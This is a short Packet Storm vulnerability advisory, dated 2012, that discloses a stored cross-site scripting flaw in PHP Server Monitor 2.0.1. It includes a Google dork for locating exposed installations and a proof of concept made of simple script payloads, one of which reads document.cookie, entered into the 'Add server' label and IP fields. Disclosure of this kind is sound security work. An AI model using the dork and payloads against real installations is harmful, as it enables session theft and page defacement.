PHP Server Monitor Cross Site Scripting

2012-11-21T00:00:00
ID PACKETSTORM:118254
Type packetstorm
Reporter loneferret
Modified 2012-11-21T00:00:00

Description

                                        
                                            `# Author: loneferret of Offensive Security  
# Product: PHP Server Monitor  
# Version: 2.0.1 (and maybe older versions)  
# Google Dork: intext="Powered by PHP Server Monitor v2.0.1"  
# (yes people have made this available on the web)  
  
# Software Download: http://sourceforge.net/projects/phpservermon/  
  
# Tested on: Ubuntu Linux  
  
# Software Description  
# PHP Server Monitor is a script that checks whether the servers on your list are up and running on the selected ports.  
# It comes with a web based user interface where you can add and remove servers or websites from the MySQL database,  
# and you can manage users for each server with a mobile number and email address.  
# On the "Add server" page, you can choose  
# whether it's a "service" or a "website":  
  
# Vulnerability: Stored XSS  
# Label name or pretty much any other text field such as IP  
# Inserting html code can pretty much screw up the whole page as well.  
# PoC:  
# <script>alert('xss');</script>  
# <script>alert(document.cookie);</script>  
# <iframe>something</iframe>  
#  
  
# There are other things I'm sure  
  
`